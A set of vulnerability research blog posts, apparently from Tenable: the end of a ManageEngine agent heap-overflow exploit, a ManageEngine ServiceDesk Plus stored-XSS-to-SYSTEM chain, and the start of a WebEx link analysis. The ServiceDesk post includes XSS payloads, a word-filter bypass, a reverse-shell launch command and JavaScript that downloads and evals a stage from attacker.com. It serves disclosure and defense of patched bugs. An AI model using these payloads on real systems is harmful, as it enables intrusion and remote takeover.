I am unable to write executable pointers with my write primitive, so this means I can’t just write this GetPdbDll function address as a return address on stack memory nor can I even overwrite a function pointer with this function address. There was one place however, that I saw a pointer TO a function pointer being called which is actually possible for me to abuse. It’s in _CrtDbgReport function, which allows Microsoft runtime to alert in event of various integrity violations, one of which is a failure in heap integrity check. When using a debug heap (like in this scenario) it can be triggered if it detects unwritten portions of heap memory not containing “0xfd” bytes, since that is supposed to represent “dead-land-fill” (this is why my PoC tries to mimic these 0xfd bytes during my heap overflow, to keep this thing happy). However this time…we WANT to trigger a failure, because in _CrtDbgReport we see this:

From my research, this is where _CrtDbgReport calls a _pfnReportHook (if the application has one registered). This application does not have one registered, but we can leverage our Free_dbg write primitive again to write our own _pfnReportHook (it lives in the .data section too!). This is also great because it doesn’t have to be a pointer to executable memory (which we can’t write), since _pfnReportHook contains a pointer TO a function pointer (a big, beneficial difference for us). We just need to register our own _pfnReportHook that contains a function pointer to the function that loads “MSPDB80.dll” (no arguments needed!). Then we trigger a heap error so that _CrtDbgReport is called and in turn calls our _pfnReportHook. This should load and execute the “MSPDB80.dll” off our remote SMB share.

We have to be clever with our second write primitive, as we can no longer borrow the technique I used earlier, where subsequent heap cell allocations were used to avoid needing an infoleak. This is because that unique scenario only applied to unicode strings in this application, and we can’t represent our function pointers with unicode. For this step I chose to overwrite the _pfnReportHook variable with a random offset in my heap (again, no infoleak required; it is a similar technique to the earlier partial pointer overwrite, but this time overwriting the lower two bytes of the pointer in order to obtain a decent random heap offset). I then trigger my heap overflow again in order to clobber an enormous portion of the heap with repeating function pointers to the GetPdbDll function.

Yes this will certainly crash the program but that’s ok! We are at the finish line and this severe heap corruption will trigger a call to our _pfnReportHook before a crash happens. From our earlier overwrite, our _pfnReportHook pointer should point to some random address in my heap which likely contains a GetPdbDll function pointer (which I massively sprayed). This should result in RCE once _pfnReportHook is called.

Loading dll off remote SMB share that displays a whoami

As mentioned, this is not a super reliable exploit as-is, but I was able to prove it can work. You should be able to find the PoC for this on Tenable’s PoC github — https://github.com/tenable/poc. Manage Engine has since patched this issue. For more of these details you can check out this ManageEngine advisory at https://www.tenable.com/security/research.


Integer Overflow to RCE — ManageEngine Asset Explorer Agent (CVE-2021–20082) was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Stored XSS to RCE Chain as SYSTEM in ManageEngine ServiceDesk Plus

The unauthorized access of FireEye red team tools was an eye-opening event for the security community. In my personal opinion, it was especially enlightening to see the “prioritized list of CVEs that should be addressed to limit the effectiveness of the Red Team tools.” This list can be found on FireEye’s GitHub. The list reads to me as though these vulnerabilities are probably being exploited during FireEye red team engagements. More than likely, the listed products are commonly found in target environments. As a 0-day bug hunter, this screams out, “hunt me!” So we did.

Last, but not least, on the list is “CVE-2019–8394 — arbitrary pre-auth file upload to ZoHo ManageEngine ServiceDesk Plus.” A Shodan search for “ManageEngine ServiceDesk Plus” in the page title reveals over 5,000 public-facing instances. We chose to target this product, and we found some high impact vulnerabilities. On one hand, we’ve found a way to fully compromise the server, and on the other, we can exploit the agent software. This is a pentester’s pivoting playground.

Our story will be split into two blogs. Pivot over to David Wells’ related blog to check out a mind-bending heap overflow in the AssetExplorer Agent. For bugs on the server-side stay tuned.

TLDR

ManageEngine ServiceDesk Plus, prior to version 11200, is susceptible to a vulnerability chain leading to unauthenticated remote code execution. An unauthenticated, remote attacker is able to upload a malicious asset to the help desk. Once an unknowing help desk administrator views this new asset, the attacker can take control of the help desk application and fully compromise the underlying operating system.

The two flaws in the exploit chain include an unauthenticated stored cross-site scripting vulnerability (CVE-2021–20080) and a case of weak input validation (CVE-2021–20081) leading to arbitrary code execution. Initial access is first gained via cross-site scripting, and once triggered, the attacker can schedule the execution of malicious code with SYSTEM privileges. Below I have detailed these vulnerabilities.

Gaining a Foothold via XML Asset Ingestion

A key component of an IT service desk is the ability to manage assets. For example, company laptops, desktops, etc would likely be provisioned by IT and managed in a service desk software.

In ManageEngine ServiceDesk Plus (SDP), there is an API endpoint that allows an unauthenticated HTTP client to upload XML files containing asset definitions. The asset definition file allows all sorts of details to be defined, such as make, model, operating system, memory, network configuration, software installed, etc.

When a valid asset is POSTed to /discoveryServlet/WsDiscoveryServlet, an XML file is created on the server’s file system containing the asset. This file will be stored at C:\Program Files\ManageEngine\ServiceDesk\scannedxmls.

After a minute or so, it will be automatically picked up by SDP for processing. The asset will then be stored in the database, and it will be viewable as an asset in the administrative web user interface.

Below is an example of a Mac asset being uploaded. For the sake of brevity, I’ve left out most of the XML file. The key component is bolded on the line starting with “inet” in the “/sbin/ifconfig” output. The full proof of concept (PoC) can be found on our TRA-2021–11 research advisory.

Notice that the IP address contains JavaScript code to fire an alert. This is where the vulnerability rears its ugly head. The injected JavaScript will not be sanitized prior to being loaded in a web browser. Hence, the attacker can execute arbitrary JavaScript and abuse this flaw to perform administrative actions in the help desk application.

<?xml version="1.0" encoding="UTF-8" ?><DocRoot>
… snip ...
<NIC_Info><command>/sbin/ifconfig</command><output><![CDATA[
en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
options=400<CHANNEL_IO>
ether 8c:85:90:d4:a6:e9
inet6 fe80::103b:588a:7772:e9db%en0 prefixlen 64 secured scopeid 0x5
inet ');}{alert("xss");// netmask 0xffffff00 broadcast 192.168.0.255
nd6 options=201<PERFORMNUD,DAD>
media: autoselect
status: active
]]></output></NIC_Info>
… snip ...
</DocRoot>

Let’s assume this XML is processed by SDP. When the administrator views this specific asset in SDP, a JavaScript alert would fire.

It’s pretty clear here that a stored cross-site scripting vulnerability exists, and we’ve assigned it as CVE-2021–20080. The root cause of this vulnerability is that the IP address is used to construct a JavaScript function without sanitization. This allows us to inject malicious JavaScript. In this case, the function would be constructed as such:

function clickToExpandIP(){
jQuery('#ips').text('[ ');}{alert("xss");// ]');
}

Notice how I closed the text() function call and the clickToExpandIP() function definition.

.text('[ ');}

After this, since there is a hanging closing curly brace on the next line, I start a new block, call alert, and comment out the rest of the line.

{alert("xss");//
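To see the breakout end to end, the following Python sketch reconstructs the vulnerable template as plain string formatting. The `render_click_to_expand` function is a hypothetical reconstruction based on the generated JavaScript shown above, not SDP’s actual server-side code, and the benign IP address is a placeholder.

```python
def render_click_to_expand(ip_address: str) -> str:
    """Hypothetical reconstruction of the server-side template: the IP
    address is pasted into a JavaScript string literal without escaping."""
    return (
        "function clickToExpandIP(){\n"
        f"jQuery('#ips').text('[ {ip_address} ]');\n"
        "}"
    )


# The payload closes the string, the call and the function body, opens a
# new block for the attacker's code, and comments out the leftovers.
payload = "');}{alert(\"xss\");//"

print(render_click_to_expand("192.168.0.10"))
print(render_click_to_expand(payload))
```

Escaping the quote characters (or treating the address as data rather than code) before building the function would stop the breakout in this model.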

Alert! We won’t stop here. Let’s ride the victim administrator’s session.

Reusing the HttpOnly Cookies

When a user logs in, the following session cookies are set in the response:

Set-Cookie: SDPSESSIONID=DC6B4FDF88491030FD4CE332509EE267; Path=/; HttpOnly
Set-Cookie: JSESSIONIDSSO=167646B5D793A91BC5EA12C1CAB9BEAB; Path=/; HttpOnly

The cookies have the HttpOnly flag set, which prevents JavaScript from accessing these cookie values directly. However, that doesn’t mean we can’t reuse the cookies in an XMLHttpRequest. The cookies will be included in the request, just as if it were a form submission.

The problem here is that a CSRF token is also in play. For example, if a user were to be deleted, the following request would fire.

DELETE /api/v3/users?ids=9 HTTP/1.1
Host: 172.26.31.177:8080
Content-Length: 160
Cache-Control: max-age=0
Accept: application/json, text/javascript, */*; q=0.01
X-ZCSRF-TOKEN: sdpcsrfparam=07b3f63e7109455ca9e1fad3871e92feb7aa22c086d43e0dfb3f09c0e9d77163481dc8e914422808f794c020c6e9e93fc0f9de633dab681eefe356bb9d18a638
X-Requested-With: XMLHttpRequest
If-Modified-Since: Thu, 1 Jan 1970 00:00:00 GMT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://172.26.31.177:8080
Referer: http://172.26.31.177:8080/SetUpWizard.do?forwardTo=requester&viewType=list
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SDPSESSIONID=DC6B4FDF88491030FD4CE332509EE267; JSESSIONIDSSO=167646B5D793A91BC5EA12C1CAB9BEAB; PORTALID=1; sdpcsrfcookie=07b3f63e7109455ca9e1fad3871e92feb7aa22c086d43e0dfb3f09c0e9d77163481dc8e914422808f794c020c6e9e93fc0f9de633dab681eefe356bb9d18a638; _zcsr_tmp=07b3f63e7109455ca9e1fad3871e92feb7aa22c086d43e0dfb3f09c0e9d77163481dc8e914422808f794c020c6e9e93fc0f9de633dab681eefe356bb9d18a638; memarketing-_zldp=Mltw9Iqq5RScV1w4XmHqtfyjDzbcGg%2Fgj2ZFSsChk9I%2BFeA4HQEbmBi6kWOCHoEBmdhXfrM16rA%3D; memarketing-_zldt=35fbbf7a-4275-4df4-918f-78167bc204c4-0
Connection: close

sdpcsrfparam=07b3f63e7109455ca9e1fad3871e92feb7aa22c086d43e0dfb3f09c0e9d77163481dc8e914422808f794c020c6e9e93fc0f9de633dab681eefe356bb9d18a638&SUBREQUEST=XMLHTTP

Notice the use of the ‘X-ZCSRF-TOKEN’ header and the ‘sdpcsrfparam’ request parameter. The token value is also passed in the ‘sdpcsrfcookie’ and ‘_zcsr_tmp’ cookies. This means subsequent requests won’t succeed unless we set the proper CSRF headers and cookies.

However, when the CSRF cookies are set, they do not set the HttpOnly flag. Because of this, our malicious JavaScript can harvest the value of the CSRF token in order to provide the required headers and request data.

Putting it all together, we are able to send an XMLHttpRequest:

  • with the proper session cookie values
  • and with the required CSRF token values.
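The HttpOnly distinction that makes this possible is easy to check mechanically. The following Python sketch splits Set-Cookie values by hand and lists the cookies a script could read. The two session headers are copied from the response above; the shape of the CSRF cookie header is an assumption (its Set-Cookie line is not shown in this post) and its value is a placeholder.

```python
def cookie_flags(set_cookie_value: str) -> tuple:
    """Return (cookie name, has_httponly) for one Set-Cookie header value."""
    parts = [p.strip() for p in set_cookie_value.split(";")]
    name = parts[0].split("=", 1)[0]
    has_httponly = any(p.lower() == "httponly" for p in parts[1:])
    return name, has_httponly


headers = [
    "SDPSESSIONID=DC6B4FDF88491030FD4CE332509EE267; Path=/; HttpOnly",
    "JSESSIONIDSSO=167646B5D793A91BC5EA12C1CAB9BEAB; Path=/; HttpOnly",
    # Assumed header shape for the CSRF cookie; the value is a placeholder.
    "sdpcsrfcookie=PLACEHOLDER; Path=/",
]

# Cookies without HttpOnly are visible to JavaScript running in the page.
readable_by_script = [
    name for name, httponly in map(cookie_flags, headers) if not httponly
]
print(readable_by_script)
```

Under those assumptions only the CSRF cookie is script-readable, which is exactly the gap described above: the session cookies ride along automatically, and the token can be read and echoed back.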

No Spaces Allowed

Another fun roadblock was the fact that spaces couldn’t be included in the IP address. If we were to specify the line with “AN IP” as the IP address:

inet AN IP netmask 0xffffff00 broadcast 192.168.0.255

The JavaScript function would be generated as such:

function clickToExpandIP(){
jQuery('#ips').text('[ AN ]');
}

Notice that ‘IP’ was truncated. This is due to the way that ServiceDesk Plus parses the IP address field. It expects an IP address followed by a space, so the “IP” text would be truncated in this case.

However, this can be bypassed using multiline comments to replace spaces.

');}{var/**/text="stillxss";alert(text);//
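Both halves of this roadblock can be modeled in a few lines of Python. This is only a sketch: `parse_ip_field` is a guess at the parsing behavior based on the truncation seen above, not ServiceDesk Plus code, and `without_spaces` is a hypothetical helper that blindly replaces every space (including any inside string literals).

```python
def parse_ip_field(line: str) -> str:
    """Assumed parser behavior: keep the token after 'inet', up to the next space."""
    return line.split(" ")[1]


def without_spaces(js: str) -> str:
    """Swap each space for an empty block comment, which JavaScript treats as whitespace."""
    return js.replace(" ", "/**/")


truncated = parse_ip_field("inet AN IP netmask 0xffffff00 broadcast 192.168.0.255")
rewritten = without_spaces('var text="stillxss";')

print(truncated)
print(rewritten)
```

Because the rewritten statement contains no spaces, it survives as a single token under the assumed parsing.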

Putting these pieces together, this means when we exploit the XSS, and the administrator views our malicious asset, we can fire valid (and complex) application requests with administrative privileges. In particular, I ended up abusing the custom scheduled task feature.

Code Execution via a Malicious Custom Schedule

As IT service desk software, ManageEngine ServiceDesk Plus has loads of functionality. Similar to other IT software out there, it allows you to create custom scheduled tasks. Also similar to other IT software, it lets you run system commands. With powerful functionality, there is a fine line separating a vulnerability and a feature that simply works as designed. In this case, there is a clear vulnerability (CVE-2021-20081).

Custom Schedule Screen

Above I have pasted a screen shot of the form that allows an administrator to create a custom schedule. Notice the executor example in the Action section. This allows the administrator to run a command on a scheduled basis.

Dangerous, yes. A vuln? Not yet. It’s by design.

What happens if the administrator wants to write some text to the file system using this feature?

Administrator attempts to write to C:\test.txt

Interestingly, “echo” is a restricted word. Clearly a filter is in place to deny this word, probably for cases like this. After some code review, I found an XML file defining a list of restricted words.

C:\Program Files\ManageEngine\ServiceDesk\conf\Asset\servicedesk.xml:

<GlobalConfig globalconfigid="GlobalConfig:globalconfigid:2600" category="Execute_Script" parameter="Restricted_Words" paramvalue="outfile,Out-File,write,echo,OpenTextFile,move,Move-Item,move,mv,MoveFile,del,Remove-Item,remove,rm,unlink,rmdir,DeleteFile,ren,Rename-Item,rename,mv,cp,rm,MoveFile" description="Script Restricted Words"/>

Notice the word “echo” and a bunch of other words that all seem to relate to file system operations. Clearly the developer did not want to allow a custom scheduled task to explicitly modify files.

If we look at com.adventnet.servicedesk.utils.ServiceDeskUtil.java, we can see how the filter is applied.

public String[] getScriptRestrictedWords() throws Exception {
    String restrictedWords = GlobalConfigUtil.getInstance().getGlobalConfigValue("Restricted_Words", "Execute_Script");
    return restrictedWords.split(",");
}

public Set containsScriptRestrictedWords(String input) throws Exception {
    HashSet<String> input_words = new HashSet<String>();
    input_words.addAll(Arrays.asList(input.split(" ")));
    input_words.retainAll(Arrays.asList(this.getScriptRestrictedWords()));
    return input_words;
}

Most notably, the command line input string is split into words using a space character as a delimiter.

input_words.addAll(Arrays.asList(input.split(" ")));

This method of blocking commands containing restricted words is simply inadequate, and this is where the vulnerability comes into play. Let me show you how this filter can be bypassed.

One bypass for this involves the use of commas (or semicolons) to delimit the arguments of a command. For example, all of these commands are equivalent.

c:\>echo "Hello World"
"Hello World"
c:\>echo,"Hello World"
"Hello World"
c:\>echo;"Hello World"
"Hello World"

With this in mind, an administrator could craft a command with commas to write to disk. For example:

cmd /c "echo,testing > C:\\test.txt"
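The weakness is easy to reproduce outside the product. Below is a minimal Python port of the check, assuming it behaves exactly like the Java shown above (split on single spaces, intersect with the configured list). The function name mirrors the Java method, but the port itself is illustrative. The test commands are written without the surrounding double quotes, because under this logic a leading quote glued to a word would already stop it from matching.

```python
# Word list copied from the Restricted_Words entry in servicedesk.xml above.
RESTRICTED_WORDS = (
    "outfile,Out-File,write,echo,OpenTextFile,move,Move-Item,move,mv,MoveFile,"
    "del,Remove-Item,remove,rm,unlink,rmdir,DeleteFile,ren,Rename-Item,rename,"
    "mv,cp,rm,MoveFile"
).split(",")


def contains_script_restricted_words(command: str) -> set:
    """Python port of the Java check: split on spaces, intersect with the list."""
    return set(command.split(" ")) & set(RESTRICTED_WORDS)


flagged = contains_script_restricted_words(r"cmd /c echo testing > C:\test.txt")
bypassed = contains_script_restricted_words(r"cmd /c echo,testing > C:\test.txt")

print(flagged)
print(bypassed)
```

The first command is caught because `echo` stands alone as a token. In the second, the token is `echo,testing`, which is not in the list, so the intersection is empty and the command passes.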

Even better, the command will execute with NT AUTHORITY\SYSTEM privileges. Sysinternals Process Monitor will prove that:

Pop a Shell

I opted for a Java-based reverse shell since I knew a Java executable would be shipped with ServiceDesk Plus. It is written in Java, after all. The command line contains the following logic.

I first used ‘echo’ to write out a Base64-encoded Java class.

echo,<Base64 encoded Java reverse shell class>> b64file

After that I used ‘certutil’ to decode the data into a functioning Java class. Thanks to Casey Dunham for the awesome Java reverse shell.

certutil -f -decode b64file ReverseTcpShell.class

And finally, I used the provided Java executable to launch a reverse shell that connects back to the attacker’s listener at IP:port.

C:\\PROGRA~1\\ManageEngine\\ServiceDesk\\jre\\bin\\java.exe ReverseTcpShell <attacker ip> <attacker port>

Chaining these Together

From a high level, an exploit chain looks like the following:

  1. Send an XML asset file to SDP containing our malicious JavaScript code.
  2. After a short period of time, SDP will process the XML file and add the asset.
  3. When the administrator views the asset, the JavaScript fires. This can be encouraged by sending a link to the administrator.
  4. The JavaScript will create a malicious custom scheduled task to execute in 1 minute.
  5. After one minute, the scheduled task executes, and a reverse shell connects back to the attacker’s machine.

This is the basic overview of a full exploit chain. However, there was a wrench thrown in that I’d like to mention. Namely, there was a maximum length enforced. Due to the length of a reverse shell payload, this restriction required me to use a staged approach.

Let me show you.

Staging the Custom Schedule

In order to solve this problem, I set up an HTTP listener that, when contacted by my XSS payload, would send more JavaScript code back to the browser. The XSS would then call eval() on this code, thereby loading another stage of JavaScript code.

So basically, the initial XSS payload contains enough code to reach out to the attacker’s HTTP server, and downloads another stage of JavaScript to be executed using eval(). Something like this:

function loaded() {
eval(this.responseText);
}
var req = new XMLHttpRequest();
req.addEventListener("load", loaded);
req.open("GET","http://attacker.com/more_js");
req.send(null);

Once the JavaScript downloads, the loaded() function fires. The one catch is that since we’re in the browser, a CORS header needs to be set by the attacker’s listener:

Access-Control-Allow-Origin: *

This will tell the browser it’s okay to load the attacker server’s content in the ServiceDesk Plus application, since they’re cross-origin. Using this strategy, a massive chunk of JavaScript can be loaded. With all of this in mind, a full exploit can be constructed like so:

  1. Send an XML asset file to SDP containing our malicious JavaScript code.
  2. After a short period of time, SDP will process the XML file and add the asset.
  3. When the administrator views the asset, the JavaScript fires. This can be encouraged by sending a link to the administrator.
  4. The XSS will download more JavaScript from the attacker’s HTTP server.
  5. The downloaded JavaScript will create a malicious custom scheduled task to execute in 1 minute.
  6. After one minute, the scheduled task executes, and a reverse shell connects back to the attacker’s machine.

Let’s see all of this in action:

https://www.youtube.com/watch?v=DhrJxVqmsIo

Wrapping Up

We’ve now seen how an unauthenticated attacker can exploit a cross-site scripting vulnerability to gain remote code execution in ManageEngine ServiceDesk Plus. As I said earlier, David Wells has managed to exploit a heap overflow in the AssetExplorer agent software. If you’re an SDP or AssetExplorer server administrator, this is the agent software that you would distribute to assets on the network. This vulnerability would allow an attacker to pivot from SDP to agents. As you might imagine this is a dangerous attack scenario.

ManageEngine did a solid job of patching. I reported the bugs on March 17, 2021. The XSS was patched by April 7, 2021, and the RCE was patched by June 1, 2021. That’s a fast turnaround!

For more detailed information on the vulnerabilities, take a look at our research advisories: TRA-2021-11 and TRA-2021-22.


Stored XSS to RCE Chain as SYSTEM in ManageEngine ServiceDesk Plus was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Cisco WebEx Universal Links Redirect

What’s dumber than an open redirect? This.

The following is a quick and dirty companion write-up for TRA-2021-34. The issue described has been fixed by the vendor.

After being forced to use WebEx a little while back, I noticed that the URIs and protocol handlers for it on macOS contained more information than you typically see, so I decided to investigate. There are a handful of valid protocol handlers for WebEx, but the one I’ll reference for the rest of this blog is “webexstart://”.

When you visit a meeting invite for any of the popular video chat apps these days, you typically get redirected to some sort of launchpad webpage that grabs the meeting information behind the scenes and then makes a request using the appropriate protocol handler in the background, which is then used to launch the corresponding application. This is generally a pretty seamless and straightforward process for end-users. Interrupting this process and looking behind the scenes, however, can give us a good look at the information required to construct this handler. A typical protocol handler constructed for Cisco WebEx looks like this:

webexstart://launch/V2ViRXhfbWNfbWVldDExMy1lbl9fbWVldDExMy53ZWJleC5jb21fZXlKMGIydGxiaUk2SW5CRVVGbDFUSHBpV0ZjaUxDSmtiM2R1Ykc5aFpFOXViSGtpT21aaGJITmxMQ0psYm1GaWJHVkpia0Z3Y0VwdmFXNGlPblJ5ZFdVc0ltOXVaVlJwYldWVWIydGxiaUk2SWlJc0lteGhibWQxWVdkbFNXUWlPakVzSW1OdmNuSmxiR0YwYVc5dVNXUWlPaUpqTVRnd1kyVXlNQzFtTWpKaExUUTFZamt0T1RFd09TMDVZVFk1TlRRelpHTmlOREVpTENKMGNtRmphMmx1WjBsRUlqb2lkMlZpWlhndGQyVmlMV05zYVdWdWRGOWpNemRsTkdFMVlTMHpPRGxtTFRRek1qZ3RPVEl5WlMwM1lqTTBaREl4TTJZeVpUQmZNVFl5TXpnMk5EQXhOell3TlNJc0ltTmtia2h2YzNRaU9pSmhhMkZ0WVdsalpHNHVkMlZpWlhndVkyOXRJaXdpY21WbmRIbHdaU0k2SWpFeUpUZzJJbjA9\/V2?t=99999999999999&t1=%URLProtocolLaunchTime%&[email protected]&p=eyJ1dWlkIjoiNGVjYjdlNTJhODI3NGYzN2JlNDFhZWY1NTMxZDg3MmMiLCJjdiI6IjQxLjYuNC44IiwiY3dzdiI6IjExLDQxLDA2MDQsMjEwNjA4LDAiLCJzdCI6Ik1DIiwibXRpZCI6Im02NjkyMGNlNzJkMzYwMGEyNDZiMWUxMGE4YWY5MmJkNyIsInB2IjoiVDMzXzY0VU1DIiwiY24iOiJBVENPTkZVSS5CVU5ETEUiLCJmbGFnIjozMzU1NDQzMiwiZWpmIjoiMiIsImNwcCI6ImV3b2dJQ0FnSW1OdmJXMXZiaUk2SUhzS0lDQWdJQ0FnSUNBaVJHVnNZWGxTWldScGNtVmpkQ0k2SUNKMGNuVmxJZ29nSUNBZ2ZTd0tJQ0FnSUNKM1pXSmxlQ0k2SUhzS0lDQWdJQ0FnSUNBaVNtOXBia1pwY25OMFFteGhZMnRNYVhOMElqb2dXd29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJalF4TGpRaUxBb2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lqUXhMalVpQ2lBZ0lDQWdJQ0FnWFFvZ0lDQWdmU3dLSUNBZ0lDSmxkbVZ1ZENJNklIc0tDaUFnSUNCOUxBb2odJQ0FnSW5SeVlXbHVhVzVuSWpvZ2V3b0tJQ0FnSUgwc0NpQWdJQ0FpYzNWd2NHOXlkQ0k2SUhzS0lDQWdJQ0FnSUNBaVIzQmpRMjl0Y0c5dVpXNTBUbUZ0WlNJNklDSkRhWE5qYnlCWFpXSmxlQ0JUZFhCd2IzSjBMbUZ3Y0NJS0lDQWdJSDBLZlFvPSIsInVsaW5rIjoiYUhSMGNITTZMeTl0WldWME1URXpMbmRsWW1WNExtTnZiUzkzWW5odGFuTXZhbTlwYm5ObGNuWnBZMlV2YzJsMFpYTXZiV1ZsZERFeE15OXRaV1YwYVc1bkwzTmxkSFZ3ZFc1cGRtVnljMkZzYkdsdWEzTS9jMmwwWlhWeWJEMXRaV1YwTVRFekptMWxaWFJwYm1kclpYazlNVGd5TWpnMk5qTTBOeVpqYjI1MFpYaDBTVVE5YzJWMGRYQjFibWwyWlhKellXeHNhVzVyWHpBek16azFZamN3WmpjMU1UUmpPR1U0TTJJek5qZ3lNV1V4T1dZd05UVXlYekUyTWpNNU5UQTBNVGMzTURZbWRHOXJaVzQ5VTBSS1ZGTjNRVUZCUVZoWVlqVkVMVTFtTUZKZlVXcHFka3BTWkdacmJFRmFZVzkxY1Voa1RYbHVjSFppWHpCS1IyeFJhVEYzTWlac1lXNW5kV0ZuWlQxbGJsOVZVdz09IiwidXRvZ2dsZSI6IjEiLC
JtZSI6IjEiLCJqZnYiOiIxIiwidGlmIjoiUEQ5NGJXd2dkbVZ5YzJsdmJqMGlNUzR3SWlCbGJtTnZaR2x1WnowaVZWUkdMVGdpUHo0S1BGUmxiR1ZOWlhSeWVVbHVabTgrUEUxbGRISnBZM05GYm1GaWJHVStNVHd2VFdWMGNtbGpjMFZ1WVdKc1pUNDhUV1YwY21samMxVlNURDVvZEhSd2N6b3ZMM1J6WVRNdWQyVmlaWGd1WTI5dEwyMWxkSEpwWXk5Mk1Ud3ZUV1YwY21samMxVlNURDQ4VFdWMGNtbGpjMUJoY21GdFpYUmxjbk0rUEUxbGRISnBZM05VYVdOclpYUStVbnBJTHk5M1FVRkJRVmhqUkhCSlFTOVFja0ZWSzJGeWFXTnliVEF3TlRjMVpubFZUM0EwVFc4d1NrTnpWVXh0V2pKR1IyTkJQVDA4TDAxbGRISnBZM05VYVdOclpYUStQRU52Ym1aSlJENHhPVGN4T1RnME5UYzBNakkzTnpJek5EYzhMME52Ym1aSlJENDhVMmwwWlVsRVBqRTBNakkyTXpZeVBDOVRhWFJsU1VRK1BGUnBiV1ZUZEdGdGNENHhOakl6T0RZME1ERTNOekEzUEM5VWFXMWxVM1JoYlhBK1BFRlFVRTVoYldVK1UyVnpjMmx2Ymt0bGVUd3ZRVkJRVG1GdFpUNDhMMDFsZEhKcFkzTlFZWEpoYldWMFpYSnpQanhOWlhSeWFXTnpSVzVoWW14bFRXVmthV0ZSZFdGc2FYUjVSWFpsYm5RK01Ud3ZUV1YwY21samMwVnVZV0pzWlUxbFpHbGhVWFZoYkdsMGVVVjJaVzUwUGp3dlZHVnNaVTFsZEhKNVNXNW1iejQ9In0=

While there are several components to this URL, we’ll focus on the last one — ‘p’. ‘p’ is a base64 encoded string that contains settings information such as support app information, telemetry configurations, and the information required to set up Universal Links for macOS. When decoding the above, we can see that ‘p’ decodes to:

{"uuid":"8e18fa93cd10432a907c94fb9d3a63e6","cv":"41.6.4.8","cwsv":"11,41,0604,210608,0","st":"MC","pv":"T33_64UMC","cn":"ATCONFUI.BUNDLE","flag":33554432,"ejf":"2","cpp":"ewogICAgImNvbW1vbiI6IHsKICAgICAgICAiRGVsYXlSZWRpcmVjdCI6ICJ0cnVlIgogICAgfSwKICAgICJ3ZWJleCI6IHsKICAgICAgICAiSm9pbkZpcnN0QmxhY2tMaXN0IjogWwogICAgICAgICAgICAgICAgIjQxLjQiLAogICAgICAgICAgICAgICAgIjQxLjUiCiAgICAgICAgXQogICAgfSwKICAgICJldmVudCI6IHsKCiAgICB9LAogICAgInRyYWluaW5nIjogewoKICAgIH0sCiAgICAic3VwcG9ydCI6IHsKICAgICAgICAiR3BjQ29tcG9uZW50TmFtZSI6ICJDaXNjbyBXZWJleCBTdXBwb3J0LmFwcCIKICAgIH0KfQo=","ulink":"aHR0cHM6Ly9tZWV0MTEzLndlYmV4LmNvbS93YnhtanMvam9pbnNlcnZpY2Uvc2l0ZXMvbWVldDExMy9tZWV0aW5nL3NldHVwdW5pdmVyc2FsbGlua3M/c2l0ZXVybD1tZWV0MTEzJm1lZXRpbmdrZXk9MTgyMDIxMDYwOCZjb250ZXh0SUQ9c2V0dXB1bml2ZXJzYWxsaW5rXzNlNjNjZDFlODcyMzRlOTE4OWU2OWM2NjI2MDcxMzBiXzE2MjQwMjA4ODUwNTImdG9rZW49U0RKVFN3QUFBQVd4c0pGelhzSW1Da2l3aHQya2t4TE1WWFdJVFZpTTh4OWVnUWJlejVUaWhBMiZsYW5ndWFnZT1lbl9VUw==","utoggle":"1","me":"1","jfv":"1","tif":"PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPFRlbGVNZXRyeUluZm8+PE1ldHJpY3NFbmFibGU+MTwvTWV0cmljc0VuYWJsZT48TWV0cmljc1VSTD5odHRwczovL3RzYTMud2ViZXguY29tL21ldHJpYy92MTwvTWV0cmljc1VSTD48TWV0cmljc1BhcmFtZXRlcnM+PE1ldHJpY3NUaWNrZXQ+UnpILy93QUFBQVVoVE5VSXhKcThuKzR4N0djY2c5S1NFRWFqVHZ2aDQrWkxLSmIzTnh3aElnPT08L01ldHJpY3NUaWNrZXQ+PENvbmZJRD4xOTczMDMyMzQxNzY1MTQ3NDE8L0NvbmZJRD48U2l0ZUlEPjE0MjI2MzYyPC9TaXRlSUQ+PFRpbWVTdGFtcD4xNjIzOTM0NDg1MDUyPC9UaW1lU3RhbXA+PEFQUE5hbWU+U2Vzc2lvbktleTwvQVBQTmFtZT48L01ldHJpY3NQYXJhbWV0ZXJzPjxNZXRyaWNzRW5hYmxlTWVkaWFRdWFsaXR5RXZlbnQ+MTwvTWV0cmljc0VuYWJsZU1lZGlhUXVhbGl0eUV2ZW50PjwvVGVsZU1ldHJ5SW5mbz4="}

From this output, we have a parameter called ‘ulink’. Further decoding this parameter gets us:

https://meet113.webex.com/wbxmjs/joinservice/sites/meet113/meeting/setupuniversallinks?siteurl=meet113&meetingkey=1820210608&contextID=setupuniversallink_3e63cd1e87234e9189e69c662607130b_1624020885052&token=SDJTSwAAAAWxsJFzXsImCkiwht2kkxLMVXWITViM8x9egQbez5TihA2&language=en_US

This parameter corresponds to what’s known as “Universal Links” in the Apple ecosystem. This is the magical mechanism that allows certain URL patterns to automatically be opened with a preferred app. For example, if universal links were configured for Reddit on your iPhone, clicking any link starting with “reddit.com” would automatically open that link in the Reddit app instead of in the browser. The ‘ulink’ parameter above is meant to set up this convenience feature for WebEx.
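The two decoding steps described above (base64 to JSON, then base64 again for ‘ulink’) can be sketched in Python with only the standard library. The helper names are made up for this example, and the sample value is a small stand-in built on the spot rather than the full ‘p’ string from the handler.

```python
import base64
import json


def decode_p(p_value: str) -> dict:
    """Base64-decode the 'p' query parameter and parse the JSON inside it."""
    return json.loads(base64.b64decode(p_value))


def decode_ulink(settings: dict) -> str:
    """The 'ulink' field is itself base64, so it needs a second decode."""
    return base64.b64decode(settings["ulink"]).decode("utf-8")


# Build a small stand-in for 'p'; the URL path here is purely illustrative.
sample_ulink = base64.b64encode(b"https://meet113.webex.com/example").decode("ascii")
sample_p = base64.b64encode(
    json.dumps({"st": "MC", "ulink": sample_ulink}).encode("utf-8")
).decode("ascii")

settings = decode_p(sample_p)
print(decode_ulink(settings))
```

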